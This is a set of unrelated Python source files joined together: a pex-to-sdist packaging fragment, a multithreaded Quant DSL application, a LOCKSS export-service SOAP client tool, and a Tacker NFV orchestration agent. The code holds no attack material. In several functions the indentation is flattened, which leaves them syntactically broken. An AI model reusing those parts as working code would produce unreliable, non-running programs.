                    name=name,
                    pex=os.path.normpath(pex_path),
                    interpreter_constraints="\n".join(
                        "{index}.) {constraint}".format(index=index, constraint=constraint)
                        for index, constraint in enumerate(
                            pex_info.interpreter_constraints, start=1
                        )
                    ),
                )
            )

        entry_points = []
        if pex_info.entry_point and ":" in pex_info.entry_point:
            # Only "module:function" entry points can become console scripts.
            entry_points = [(name, pex_info.entry_point)]

        with open(os.path.join(chroot, "setup.cfg"), "w") as fp:
            fp.write(
                dedent(
                    """\
                    [metadata]
                    name = {name}
                    version = {version}

                    [options]
                    zip_safe = {zip_safe}
                    {py_modules}
                    {packages}
                    package_dir =
                        =src
                    include_package_data = True

                    {python_requires}
                    {install_requires}

                    [options.entry_points]
                    {entry_points}
                    """
                ).format(
                    name=name,
                    version=version,
                    zip_safe=zip_safe,
                    py_modules=(
                        "py_modules =\n  {}".format("\n  ".join(py_modules)) if py_modules else ""
                    ),
                    packages=(
                        "packages = \n  {}".format("\n  ".join(packages)) if packages else ""
                    ),
                    install_requires=(
                        "install_requires =\n  {}".format("\n  ".join(install_requires))
                        if install_requires
                        else ""
                    ),
                    python_requires=(
                        "python_requires = {}".format(python_requires) if python_requires else ""
                    ),
                    entry_points=(
                        "console_scripts =\n  {}".format(
                            "\n  ".join(
                                "{} = {}".format(name, entry_point)
                                for name, entry_point in entry_points
                            )
                        )
                        if entry_points
                        else ""
                    ),
                )
            )

        with open(os.path.join(chroot, "MANIFEST.in"), "w") as fp:
            fp.write("recursive-include src *")

        with open(os.path.join(chroot, "setup.py"), "w") as fp:
            fp.write("import setuptools; setuptools.setup()")

        spawn_python_job(
            args=["setup.py", "sdist", "--dist-dir", dest_dir],
            interpreter=pex.interpreter,
            expose=["setuptools"],
            cwd=chroot,
        ).wait()
|
with_multithreading.py | from threading import Event, Thread
from time import sleep
import six.moves.queue as queue
from quantdsl.application.base import QuantDslApplication
from quantdsl.domain.model.contract_valuation import ContractValuation
from quantdsl.exceptions import TimeoutError, DslCompareArgsError, DslBinOpArgsError, DslIfTestExpressionError
class ServiceExit(Exception):
    """Signal requesting an orderly shutdown of the application's services."""
class QuantDslApplicationWithMultithreading(QuantDslApplication):
    """Quant DSL application that evaluates contract calls on a pool of worker threads.

    A shared queue feeds evaluation work to ``num_threads`` daemon threads; the first
    exception raised by any worker is recorded and re-raised to callers that poll for
    results via :meth:`get_result`.
    """

    def __init__(self, num_threads=4, *args, **kwargs):
        super(QuantDslApplicationWithMultithreading, self).__init__(call_evaluation_queue=queue.Queue(),
                                                                    *args, **kwargs)
        self.num_threads = num_threads
        self.has_thread_errored = Event()
        self.thread_exception = None  # first exception raised by any worker thread
        self.threads = []
        # Start evaluation worker threads.
        for _ in range(self.num_threads):
            t = Thread(target=self.protected_loop_on_evaluation_queue)
            # Daemon threads die with the main thread. Thread.setDaemon() is
            # deprecated, so set the attribute directly (the original code
            # redundantly did both).
            t.daemon = True
            t.start()
            self.threads.append(t)

    def protected_loop_on_evaluation_queue(self):
        """Run the evaluation loop, recording the first worker exception."""
        try:
            self.loop_on_evaluation_queue()
        except Exception as e:
            if not self.has_thread_errored.is_set():
                self.thread_exception = e
                self.has_thread_errored.set()
            # Known evaluation errors are reported via check_has_thread_errored();
            # anything else is re-raised so it surfaces in the thread's traceback.
            if not isinstance(e, (TimeoutError, DslCompareArgsError, DslBinOpArgsError, DslIfTestExpressionError)):
                raise

    def get_result(self, contract_valuation):
        """Poll for a contract valuation result, surfacing any worker error."""
        assert isinstance(contract_valuation, ContractValuation)
        # Todo: Subscribe to call result, with handler that sets an event. Then wait for the
        # event with a timeout, in a while True loop, checking for interruptions and timeouts
        # like in Calculate.calculate().
        while True:
            try:
                return super(QuantDslApplicationWithMultithreading, self).get_result(contract_valuation)
            except KeyError:
                # Result not available yet: back off briefly and fail fast if a worker died.
                sleep(0.1)
                self.check_has_thread_errored()

    def check_has_thread_errored(self):
        """Raise the first exception recorded by any worker thread, if there is one."""
        if self.has_thread_errored.is_set():
            raise self.thread_exception
|
exportservice.py | #!/usr/bin/env python3
'''A library and a command line tool to interact with the LOCKSS daemon export
service via its Web Services API.'''
__copyright__ = '''\
Copyright (c) 2000-2021, Board of Trustees of Leland Stanford Jr. University,
all rights reserved.
'''
__license__ = '''\
Redistribution and use in source and binary forms, with or without
modification, are permitted provided that the following conditions are met:
1. Redistributions of source code must retain the above copyright notice,
this list of conditions and the following disclaimer.
2. Redistributions in binary form must reproduce the above copyright notice,
this list of conditions and the following disclaimer in the documentation
and/or other materials provided with the distribution.
3. Neither the name of the copyright holder nor the names of its contributors
may be used to endorse or promote products derived from this software without
specific prior written permission.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE
LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
POSSIBILITY OF SUCH DAMAGE.
'''
__version__ = '0.1'
_service = 'ExportService'
import sys
try: import zeep
except ImportError: sys.exit('The Python Zeep module must be installed (or on the PYTHONPATH)')
import argparse
import getpass
import itertools
from multiprocessing.dummy import Pool as ThreadPool
import os.path
from threading import Thread
import zeep.exceptions
import zeep.helpers
from wsutil import file_lines, make_client, enable_zeep_debugging, host_help_prefix
#
# Library
#
def create_export_files(host, username, password, auid, options):
    '''Performs a createExportFiles operation on the given host for the given AUID, and
    returns a record with the files (or None if the host has no such AU).

    Parameters:
    :param host: a host:port pair (string)
    :param username: a username for the host (string)
    :param password: a password for the host (string)
    :param auid: the AUID to export (string)
    :param options: parsed options carrying compress/exclude_dir/output_prefix/
        file_type/max_size/max_vers/translate settings

    Returns:
    - ret (dict):
        {
          'auId': '<auid>',
          'dataHandlerWrappers': [
            {
              'dataHandler' (base64Binary): zipped AU
              'name' (string): '<prefix>-<timestamp>-<5 digit id>.zip',
              'size' (long): size of dataHandler in bytes
            }
          ]
        }
    '''
    # Request payload mirroring the ExportService createExportFiles WSDL parameters.
    req = {
        'auid': auid,
        'compress': options.compress,
        'excludeDirNodes': options.exclude_dir,
        'filePrefix': options.output_prefix,
        'fileType': options.file_type,
        'maxSize': options.max_size,
        'maxVersions': options.max_vers,
        'xlateFilenames': options.translate
    }
    client = make_client(host, username, password, _service)
    try:
        ret = client.service.createExportFiles(req)
        # Convert zeep's proxy objects into plain Python dicts/lists.
        return zeep.helpers.serialize_object(ret)
    except zeep.exceptions.Fault as e:
        # An unknown AUID surfaces as a SOAP fault with this exact message.
        if e.message == 'No Archival Unit with provided identifier':
            return None
        else:
            raise
#
# Command line tool
#
class _ExportServiceOptions(object):
    """Parses and validates the command line options for the export service tool."""

    @staticmethod
    def make_parser():
        """Build and return the argparse parser for this tool."""
        usage = '%(prog)s {--host=HOST|--hosts=HFILE}... [OPTIONS]'
        parser = argparse.ArgumentParser(description=__doc__, usage=usage)
        parser.add_argument('--version', '-V', action='version', version=__version__)
        # Hosts
        group = parser.add_argument_group('Target hosts')
        group.add_argument('--host', action='append', default=list(),
                           help=host_help_prefix + ' to list of target hosts')
        group.add_argument('--hosts', action='append', default=list(), metavar='HFILE',
                           help=host_help_prefix + ' in HFILE to list of target hosts')
        group.add_argument('--password', metavar='PASS', help='UI password (default: interactive prompt)')
        group.add_argument('--username', metavar='USER', help='UI username (default: interactive prompt)')
        # AUIDs
        group = parser.add_argument_group('Target AUIDs')
        group.add_argument('--auid', action='append', default=list(), help='add AUID to list of target AUIDs')
        group.add_argument('--auids', action='append', default=list(), metavar='AFILE',
                           help='add AUIDs in AFILE to list of target AUIDs')
        # AUID operations
        group = parser.add_argument_group('AU operations')
        # this seems to be redundant. leaving in in case some future functionality does make this an optional flag
        group.add_argument('--create-export-files', action='store_true', required=True,
                           help='output export files of target AUIDs')
        # Output
        group = parser.add_argument_group('Output')
        group.add_argument('--output-directory', metavar='OUTDIR', default='.',
                           help='output directory (default: current directory)')
        group.add_argument('--output-prefix', metavar='PREFIX', default='exportservice',
                           help='prefix for output file names (default: %(default)s)')
        # NOTE(review): --compress and --exclude-dir use store_false, so PASSING the
        # flag disables the behavior even though the help text reads as an enable
        # switch — confirm this is intended.
        group.add_argument('--compress', action='store_false',
                           help='compress the export files (default: True).')
        group.add_argument('--exclude-dir', action='store_false',
                           help='exclude directory nodes from the export files (default: True).')
        group.add_argument('--file-type', default="ZIP", choices=['ZIP'],
                           help='file type of the exported AU. (default: %(default)s)')
        group.add_argument('--max-size', default=1000, type=int, help=' (default: %(default)d)')
        group.add_argument('--max-vers', default=-1, type=int, help=' (default: %(default)d)')
        group.add_argument('--translate', default=None, choices=[None],
                           help='translate export file filenames. (default: %(default)s)')
        # Other options
        group = parser.add_argument_group('Other options')
        group.add_argument('--group-by-field', action='store_true', default=False,
                           help='group results by field instead of host')
        group.add_argument('--threads', type=int, help='max parallel jobs allowed (default: no limit)')
        group.add_argument('--debug-zeep', action='store_true', help='adds zeep debugging logging')
        return parser

    def __init__(self, parser, args):
        '''
        Constructor: validates the parsed arguments and copies them onto self.

        Parameters:
        - parser (ArgumentParser instance): the option parser (used for error reporting)
        - args (Namespace): the parsed command line arguments
        '''
        super(_ExportServiceOptions, self).__init__()
        if len(args.auid) + len(args.auids) > 0 and not any([args.create_export_files]):
            parser.error('--auid, --auids can only be applied to --create-export-files')
        # hosts: explicit --host values plus one host per line of each --hosts file
        self.hosts = args.host[:]
        for f in args.hosts: self.hosts.extend(file_lines(f))
        if len(self.hosts) == 0: parser.error('at least one target host is required')
        # auids: explicit --auid values plus one AUID per line of each --auids file
        self.auids = args.auid[:]
        for f in args.auids: self.auids.extend(file_lines(f))
        # get_auids/get_auids_names/is_daemon_ready/is_daemon_ready_quiet
        if len(self.auids) == 0: parser.error('at least one target AUID is required')
        # create_export_files
        self.create_export_files = args.create_export_files
        if self.create_export_files:
            # NOTE(review): redundant with the unconditional check above; kept as-is.
            if len(self.auids) == 0: parser.error('at least one target AUID is required with --create-export-files')
        # threads: default to one thread per host
        self.threads = args.threads or len(self.hosts)
        # output_directory/output_prefix
        self.output_directory = os.path.expanduser(args.output_directory)
        if not os.path.isdir(self.output_directory):
            parser.error('no such directory: %s' % (self.output_directory,))
        if args.output_prefix is None: parser.error('--output-prefix is required')
        if '/' in args.output_prefix: parser.error('output prefix cannot contain a slash')
        self.output_prefix = args.output_prefix
        # sorting options
        self.group_by_field = args.group_by_field
        # operation options
        self.compress = args.compress
        self.exclude_dir = args.exclude_dir
        self.file_type = args.file_type
        self.max_size = args.max_size
        self.max_vers = args.max_vers
        self.translate = args.translate
        # add logging for zeep
        if args.debug_zeep:
            enable_zeep_debugging()
        # auth: fall back to interactive prompts when not given on the command line
        self._u = args.username or getpass.getpass('UI username: ')
        self._p = args.password or getpass.getpass('UI password: ')
# Last modified 2018-03-19 for unicode support and boolean False when boolean is None
def _output_record(options, lst):
print('\t'.join([str(x or '') for x in lst]))
#print('\t'.join([x.encode('utf-8') if type(x) is str else str(x or False) if type(x)==type(True) else str(x or '') for x in lst]))
# Last modified 2021-05-28
def _output_table(options, data, rowheaders, lstcolkeys, rowsort=None):
    '''Internal method to display tabular output. (Should be refactored.)

    - data: dict keyed by (rowkey_tuple, colkey_tuple) -> cell value
    - rowheaders: labels for the leading row-key columns
    - lstcolkeys: list of lists; their Cartesian product forms the column keys
    - rowsort: optional key function used to sort the row keys
    '''
    # One column per element of the Cartesian product of the column key lists.
    colkeys = [x for x in itertools.product(*lstcolkeys)]
    # Emit one header line per column-key level; row-header labels go on the last one.
    for j in range(len(lstcolkeys)):
        if j < len(lstcolkeys) - 1: rowpart = [''] * len(rowheaders)
        else: rowpart = rowheaders
        _output_record(options, rowpart + [x[j] for x in colkeys])
    # One data line per distinct row key; missing cells render as blanks.
    for rowkey in sorted(set([k[0] for k in data]), key=rowsort):
        _output_record(options, list(rowkey) + [data.get((rowkey, colkey)) for colkey in colkeys])
# Column spec for the export-files report: field key -> (column header, extractor
# applied to a dataHandlerWrapper record).
_AU_STATUS = {
    'name': ('File name', lambda r: r.get('name')),
    'size': ('Size', lambda r: r.get('size')),
}
def _do_create_export_files(options):
    '''Runs createExportFiles for every (AUID, host) pair, writes the returned ZIPs
    into options.output_directory, and prints a summary table.'''
    # (header, extractor) pairs for the summary table columns.
    headlamb = [_AU_STATUS[x] for x in _AU_STATUS]
    data = dict()
    # Fan out one SOAP call per (auid, host) pair; imap_unordered yields results as
    # they complete. The lambda reorders each tuple to (host, auid, result).
    for host, auid, result in ThreadPool(options.threads).imap_unordered( \
            lambda _tup: (_tup[1], _tup[0],
                          create_export_files(_tup[1], options._u, options._p, _tup[0], options)), \
            itertools.product(options.auids, options.hosts)):
        if result is not None:
            if result['dataHandlerWrappers'] is not None:
                source = result['dataHandlerWrappers'][0]['dataHandler']
                fstr = result['dataHandlerWrappers'][0]['name']
                if source is not None:
                    # Persist the zipped AU under its server-provided file name.
                    with open(os.path.join(options.output_directory, fstr), 'wb') as f:
                        f.write(source)
                for head, lamb in headlamb:
                    if options.group_by_field: colkey = (head, host)
                    else: colkey = (host, head)
                    data[((auid,), colkey)] = lamb(result['dataHandlerWrappers'][0])
                # NOTE(review): the table is (re)printed for every successful result;
                # confirm whether a single print after the loop was intended.
                _output_table(options, data, ['AUID'], [[x[0] for x in headlamb],
                        sorted(options.hosts)] if options.group_by_field else [sorted(options.hosts), [x[0] for x in headlamb]])
        else:
            print('File not found, unknown error encountered.')
def _dispatch(options):
if options.create_export_files: _do_create_export_files(options)
else: raise RuntimeError('Unreachable')
def _main():
    '''Main method: parse options, run the dispatch on a worker thread.'''
    # Parse command line
    parser = _ExportServiceOptions.make_parser()
    args = parser.parse_args()
    options = _ExportServiceOptions(parser, args)
    # Dispatch on a daemon thread; the join(timeout) loop keeps the main thread
    # responsive to KeyboardInterrupt while the work runs.
    t = Thread(target=_dispatch, args=(options,))
    t.daemon = True
    t.start()
    while True:
        t.join(1.5)
        if not t.is_alive(): break
if __name__ == '__main__': _main()
|
tacker_agent.py | #!/usr/bin/env python
import json
import time
import yaml
import logging
from queue import Queue
from threading import Thread
from multiprocessing.pool import Pool
from exceptions import NFVOAgentsException, NFVOAgentOptions, VIMAgentsException
from nfvo_agents import NFVOAgents
from interface import implements
from openstack_agent import OpenStackAgent
from utils import OK, ERROR, ACTIVE, TIMEOUT, TACKER_NFVO, INTERNAL, EXTERNAL
from tacker import Tacker
# The package fake_tacker should be used for performance testing or demo purposes. It takes out Tacker NFVO requests
# Also see in the beginning of the "create_vnf" function in "Core" class.
# from fake_tacker import IdentityManager, Tacker
REACHABLE = "REACHABLE"
logger = logging.getLogger('tacker_agent')
class TackerAgent(implements(NFVOAgents)):
"""Implementation of the Tacker Agent."""
    def __init__(self, auth_url, username, password, tenant_name, vim_name, vim_username, vim_password,
                 domain_id, domain_name, nfvo_id, nfvo_name):
        """Store NFVO/VIM identity data, authenticate to Tacker, and resolve the VIM id."""
        self.vim_name = vim_name
        self._vim_username = vim_username
        self._vim_password = vim_password
        self.nfvo_name = nfvo_name
        self.domain_name = domain_name
        self.domain_id = domain_id
        self.nfvo_id = nfvo_id
        self.tacker = Tacker(auth_url, username, password, tenant_name)
        # Fails hard (process exit) if vim_name is unknown to this Tacker instance.
        self.vim_id = self._get_vim_id()
    def _get_vim_id(self):
        """Resolve self.vim_name to its Tacker VIM id.

        NOTE(review): on a miss this logs critically and calls exit(1) (SystemExit)
        instead of raising NFVOAgentsException like the rest of this class — confirm
        that terminating the whole process here is intended.
        """
        vims = self.tacker.vim_list()
        for vim in vims:
            if vim['name'] == self.vim_name:
                return vim['id']
        msg = "VIM '%s' not found in '%s' platform!" % (self.vim_name, self.nfvo_name)
        logger.critical(msg)
        exit(1)
def get_vim_agent_instance(self):
"""Instantiates a VIM Agent
Raises
------
NFVOAgentsException
"""
vim_data = self.tacker.vim_show(self.vim_id)
if vim_data['type'] != 'openstack':
msg = "VIM type %s not supported." % vim_data['type']
logger.error(msg)
raise NFVOAgentsException(ERROR, msg)
vim_agent = OpenStackAgent(vim_data['auth_url'],
self._vim_username,
self._vim_password,
vim_data['vim_project']['name'],
self.vim_name
)
return vim_agent
    @staticmethod
    def vnfd_json_yaml_parser(vnfd):
        """Parses and returns a vnfd in the Tacker envelope format.

        Accepts either a JSON document already in Tacker's VNFD envelope or a raw
        TOSCA YAML template, which gets wrapped into the envelope.

        Raises
        ------
        NFVOAgentsException
        """
        # First try strict JSON; fall back to YAML parsing on failure.
        try:
            vnfd = json.loads(vnfd)
        except ValueError:
            try:
                raw_vnfd = yaml.full_load(vnfd)
                try:
                    # Rebuild the Tacker VNFD envelope around the raw TOSCA template.
                    attr_vnfd = dict()
                    attr_vnfd['tosca_definitions_version'] = raw_vnfd['tosca_definitions_version']
                    attr_vnfd['metadata'] = raw_vnfd['metadata']
                    attr_vnfd['description'] = raw_vnfd['description']
                    attr_vnfd['topology_template'] = raw_vnfd['topology_template']
                    attributes = {'vnfd': attr_vnfd}
                    head = dict()
                    head['description'] = raw_vnfd['description']
                    head['service_types'] = [{'service_type': 'vnfd'}]
                    head['attributes'] = attributes
                    vnfd = dict()
                    vnfd['vnfd'] = head
                except KeyError as e:
                    # A required TOSCA top-level key is missing.
                    msg = "YAML error format: %s" % e
                    logger.error(msg)
                    raise NFVOAgentsException(ERROR, msg)
            except yaml.YAMLError:
                msg = "VNFD should be in JSON or YAML format!"
                logger.error(msg)
                raise NFVOAgentsException(ERROR, msg)
        # The template_name inside the TOSCA metadata becomes the VNFD name.
        vnfd['vnfd']['name'] = vnfd['vnfd']['attributes']['vnfd']['metadata']['template_name']
        return vnfd
def create_vnfd(self, vnfd):
"""Create a VNF descriptor and return its ID.
:param vnfd: VNFD content
:return: vnfd_id
Raises
------
NFVOAgentsException
"""
try:
response = self.tacker.vnfd_create(vnfd)
except NFVOAgentsException as e:
error_reason = 'VNF descriptor could not be created: %s' % e.reason
logger.error(error_reason)
raise NFVOAgentsException(ERROR, error_reason)
return response['id']
def delete_vnfd(self, vnfd_id):
"""Deletes a VNF descriptor in NFVO
:param vnfd_id: VNFD ID in the Tacker
ReRaises
------
NFVOAgentsException
"""
vnfs = self.tacker.vnf_list()
vnfds = []
for vnf in vnfs:
vnfds.append(vnf['vnfd_id'])
if vnfd_id not in vnfds:
try:
self.tacker.vnfd_delete(vnfd_id)
except NFVOAgentsException as e:
error_msg = 'Unable to delete VNFD id %s: %s' % (vnfd_id, e.reason)
logger.error(error_msg)
raise NFVOAgentsException(ERROR, error_msg)
    def create_vnf_vm(self, vnfd_id, vnf_name):
        """Create a VNF VM and return its ID.

        Raises
        ------
        NFVOAgentsException
        """
        vim = self.tacker.vim_show(self.vim_id)
        if not vim:
            raise NFVOAgentsException(ERROR, "VIM name '%s' not found in '%s'!" % (self.vim_name, self.nfvo_name))
        vim_status = vim['status']
        # TODO remove the checking of PENDING status below
        """
        PENDING was added here as a work-around since mistral-lib version 2.2.0 from pip on kolla-ansible
        installation does not change the status of the Vim to REACHABLE
        """
        if vim_status not in (REACHABLE, 'PENDING'):
            raise NFVOAgentsException(ERROR, "VIM status of '%s' is '%s' in '%s' platform!"
                                      % (self.vim_name, vim_status, self.nfvo_name))
        try:
            vnf = self.tacker.vnf_create(vnfd_id, vnf_name, self.vim_id)
        except NFVOAgentsException as e:
            error_reason = 'VNF could not be created. status_code: %d, reason: %s' % (e.status, e.reason)
            logger.error(error_reason)
            raise NFVOAgentsException(ERROR, error_reason)
        return vnf['id']
    def polling(self, vnf_id):
        """Constantly checks the creation status of the VNF.

        Wait until the VNF status is set to ACTIVE on Tacker.

        :return: VNF IP address

        Raises
        ------
        NFVOAgentsException
        """
        # IMPORTANT: This is not related to Click VNF Functions. Do not confuse it!
        timeout = 300  # seconds; total budget for the VNF to become ACTIVE
        sleep_interval = 2  # seconds between Tacker status polls
        while timeout > 0:
            vnf = self.tacker.vnf_show(vnf_id)
            vnf_status = vnf['status']
            if vnf_status == ACTIVE:
                # mgmt_ip_address is a JSON-encoded mapping of VDU name -> IP.
                vnf_ip = json.loads(vnf['mgmt_ip_address'])['VDU1']
                return vnf_ip
            elif vnf_status == ERROR:
                error_reason = vnf['error_reason']
                raise NFVOAgentsException(ERROR, error_reason)
            else:
                time.sleep(sleep_interval)
                timeout -= sleep_interval
        if timeout <= 0:
            error_reason = 'TIMEOUT'
            raise NFVOAgentsException(TIMEOUT, error_reason)
def create_vnf(self, vnfp_dir, vnfd_name, vnf_name):
"""Create a VNF and initialize all tasks.
:param vnfp_dir: directory path containing the VNF Package
:param vnfd_name: a name
:param vnf_name: a name
:return: some VNF instance data
Raises
------
NFVOAgentsException
"""
vnfd_path = '%s/vnfd.json' % vnfp_dir
with open(vnfd_path) as vnfd_file:
vnfd_data = vnfd_file.read()
vnfd_data = json.loads(vnfd_data)
vnfd_data['vnfd']['name'] = vnfd_name
vnfds = self.tacker.vnfd_list()
vnfd_id = None
# Verify if the VNFD name already exists in NFVO
for vnfd in vnfds:
if vnfd['name'] == vnfd_data['vnfd']['name']:
vnfd_id = vnfd['id']
break
if not vnfd_id:
vnfd_id = self.create_vnfd(json.dumps(vnfd_data))
logger.info('VNF descriptor created with id %s', vnfd_id)
else:
logger.info('Using an existing VNF descriptor id %s!', vnfd_id)
# Generating a unique VNF name to avoid Tacker Internal Server Error
vnfs = self.tacker.vnf_list()
seq = 1
vnf_name = ''.join([vnf_name, '-', str(seq)])
while True:
vnf_list = [vnf for vnf in vnfs if vnf['name'] == vnf_name]
if len(vnf_list) > 0:
seq += 1
vnf_name = vnf_name[:-1] + str(seq)
continue
break
# Unique VNF name up to here
try:
vnf_id = self.create_vnf_vm(vnfd_id, vnf_name)
# Rollback VNFD creation
except NFVOAgentsException as e:
try:
self.delete_vnfd(vnfd_id)
logger.info("VNF descriptor id %s removed.", vnfd_id)
# in case of error on deleting VNFD
except NFVOAgentsException as ex:
logger.error(ex.reason)
e.reason = ' '.join([e.reason, ex.reason])
raise NFVOAgentsException(e.status, e.reason)
logger.info('VNF is being created with id %s', vnf_id)
# Wait until VM is fully created
try:
vnf_ip = self.polling(vnf_id)
# in case of polling exception
except NFVOAgentsException as e:
error_reason = 'VNF could not be created: %s' % e.reason
logger.error(error_reason)
raise NFVOAgentsException(e.status, error_reason)
return {
'vnfd_id': vnfd_id,
'vnf_id': vnf_id,
'vnf_ip': vnf_ip
}
def destroy_vnf(self, vnf_id):
"""Destroys a VNF and deletes its VNFD
:param vnf_id: VNF ID in the Tacker
Raises
------
NFVOAgentsException
"""
vnffgs = self.tacker.vnffg_list()
vnfs = []
for vnffg in vnffgs:
for vnf in vnffg['vnf_mapping'].values():
vnfs.append(vnf)
if vnf_id in vnfs:
message = "A VNFFG depends on this VNF!"
logger.warning(message)
raise NFVOAgentsException(ERROR, message)
vnfd_id = self.tacker.vnf_show(vnf_id)['vnfd_id']
try:
self.tacker.vnf_delete(vnf_id)
except NFVOAgentsException as e:
error_reason = 'Unable to remove VNF. status_code: %d, reason: %s' % (e.status, e.reason)
logger.error(error_reason)
raise NFVOAgentsException(ERROR, error_reason)
# polling waiting to remove successfully this VNF
timeout = 300
sleep_interval = 2
while timeout > 0:
timeout -= sleep_interval
time.sleep(sleep_interval)
try:
vnf = self.tacker.vnf_show(vnf_id)
except NFVOAgentsException as e:
if e.status == 404: # error 404 means not found, i.e. VNF has been deleted
break
else:
error_reason = 'Unable to get VNF %s. %s' % (vnfd_id, e.reason)
logger.error(error_reason)
raise NFVOAgentsException(ERROR, error_reason)
if vnf and vnf['status'] != 'PENDING_DELETE':
error_reason = "VNF in %s status!" % vnf['status']
logger.error(error_reason)
raise NFVOAgentsException(ERROR, error_reason)
self.delete_vnfd(vnfd_id)
    def list_vnfs(self):
        """ List all Tacker VNFs running on this agent's VIM.

        :return: a list of dict containing all Tacker VNFs

        Raises
        ------
        NFVOAgentsException
        """
        response = self.tacker.vnf_list()
        vnfs = []
        for vnf in response:
            vnf_id = vnf['id']
            vnf_name = vnf['name']
            # mgmt_ip_address may be None while the VNF is still booting.
            try:
                mgmt_url = json.loads(vnf['mgmt_ip_address'])['VDU1']
            except TypeError:
                mgmt_url = ''
            # The compute instance name is embedded in the rendered heat template.
            try:
                instance = vnf['attributes']['heat_template']
                instance = yaml.full_load(instance)
                instance_name = instance['resources']['VDU1']['properties']['name']
            except KeyError:
                instance_name = ''
            vnfd_id = vnf['vnfd_id']
            vnf_status = vnf['status']
            # Only report VNFs that run on this agent's VIM.
            if vnf['vim_id'] == self.vim_id:
                vnfs.append({
                    'vnf_id': vnf_id,
                    'vnf_name': vnf_name,
                    'instance_name': instance_name,
                    'mgmt_url': mgmt_url,
                    'vnfd_id': vnfd_id,
                    'vnf_status': vnf_status,
                    'platform': TACKER_NFVO,
                    'domain_name': self.domain_name,
                    'nfvo_name': self.nfvo_name,
                    'vim_name': self.vim_name
                })
        return vnfs
    def show_vnf(self, vnf_id):
        """Get information about a given VNF from Tacker.

        :param vnf_id: the ID from a given VNF in Tacker
        :return: a dict with a few information about a given VNF (empty if not found)

        Raises
        ------
        NFVOAgentsException
        """
        vnf = {}
        response = self.tacker.vnf_show(vnf_id)
        if response:
            # Management IP and instance name are embedded in JSON/heat payloads.
            mgmt_url = json.loads(response['mgmt_ip_address'])['VDU1']
            instance = response['attributes']['heat_template']
            instance = yaml.full_load(instance)
            instance_name = instance['resources']['VDU1']['properties']['name']
            vnf['id'] = response['id']
            vnf['name'] = response['name']
            vnf['status'] = response['status']
            vnf['error_reason'] = response['error_reason']
            vnf['vnfd_id'] = response['vnfd_id']
            vnf['mgmt_address'] = mgmt_url
            vnf['vm_name'] = instance_name
        return vnf
def list_vnf_nfvo_resources(self, vnf_id):
"""List resources such as VDU and CP.
ReRaises
------
NFVOAgentsException
"""
resources = self.tacker.vnf_resources(vnf_id)
return resources
def create_vnffgd(self, vnffgd):
"""Create VNF Forwarding Graph Descriptor in Tacker.
:return: Tacker's VNFFGD ID
Raises
------
NFVOAgentsException
"""
try:
response = self.tacker.vnffgd_create(vnffgd)
except NFVOAgentsException as e:
error_reason = 'VNFFG descriptor could not be created: %s' % e.reason
logger.error(error_reason)
raise NFVOAgentsException(ERROR, error_reason)
return response['id']
def list_vnffgds(self):
"""Retrieves the list of VNFFGDs from Tacker
ReRaises
------
NFVOAgentsException
"""
vnffgds = self.tacker.vnffgd_list()
return vnffgds
def delete_vnffgd(self, vnffgd_id):
"""Delete a given VNFFGD in Tacker
Raises
------
NFVOAgentsException
"""
try:
self.tacker.vnffgd_delete(vnffgd_id)
except NFVOAgentsException as e:
error_msg = 'Unable to delete VNFFGD id %s: %s' % (vnffgd_id, e.reason)
logger.error(error_msg)
raise NFVOAgentsException(ERROR, error_msg)
logger.info("VNFFGD %s removed successfully!", vnffgd_id)
def create_vnffg(self, vnffgd_id, vnf_mapping, vnffg_name):
"""Create VNF Forwarding Graph.
:return: Tacker's VNFFG ID
Raises
------
NFVOAgentsException
"""
vnf_mapping = json.dumps(vnf_mapping)
try:
vnffg = self.tacker.vnffg_create(vnffgd_id, vnf_mapping, vnffg_name)
except NFVOAgentsException as e:
error_msg = 'Unable to instantiate VNFFG name %s: %s' % (vnffg_name, e.reason)
logger.error(error_msg)
raise NFVOAgentsException(ERROR, error_msg)
return vnffg['id']
def show_vnffg(self, vnffg_id):
"""Retrieves a given VNFFG in Tacker
Raises
------
NFVOAgentsException
"""
vnffg = self.tacker.vnffg_show(vnffg_id)
return vnffg
def vnffg_list(self):
"""Retrieves all VNFFGs from Tacker
ReRaises
------
NFVOAgentsException
"""
vnffgs = self.tacker.vnffg_list()
return vnffgs
def destroy_vnffg(self, vnffg_id):
"""Deletes a given VNFFG in Tacker
Raises
------
NFVOAgentsException
"""
try:
self.tacker.vnffg_delete(vnffg_id)
except NFVOAgentsException as e:
error_msg = 'Unable to destroy VNFFG id %s: %s' % (vnffg_id, e.reason)
logger.error(error_msg)
raise NFVOAgentsException(ERROR, error_msg)
logger.info("VNFFG %s destroyed successfully!", vnffg_id)
def list_sfcs(self):
"""Retrieves the list of SFCs in Tacker
:return: a list of VNFFGs with particular fields
Raises
------
NFVOAgentsException
"""
response = self.tacker.vnffg_list()
sfcs = self.tacker.sfc_list()
# Getting the VNF Chain of each NFP from all SFCs
nfps = {}
for sfc in sfcs:
vnf_chain = []
for vnf in sfc['chain']:
vnf_chain.append(vnf['name'])
nfps[sfc['nfp_id']] = vnf_chain
vnffgs = []
for vnffg in response:
vnffg_id = vnffg['id']
name = vnffg['name']
state = vnffg['status']
vnffgs.append({
'id': vnffg_id,
'name': name,
'status': state,
'vnf_chain': nfps[vnffg['forwarding_paths']],
'platform': TACKER_NFVO
})
return vnffgs
def get_fip_router_interface_id(self, net_name):
"""Retrieves Floating IP router network port ID
:param net_name: Network name to retrieve the router port ID (gateway)
:return: network_src_port_id
Raises
------
NFVOAgentsException
"""
vim_agent = self.get_vim_agent_instance()
try:
src_port_id = vim_agent.get_fip_router_interface(net_name)
except VIMAgentsException as e:
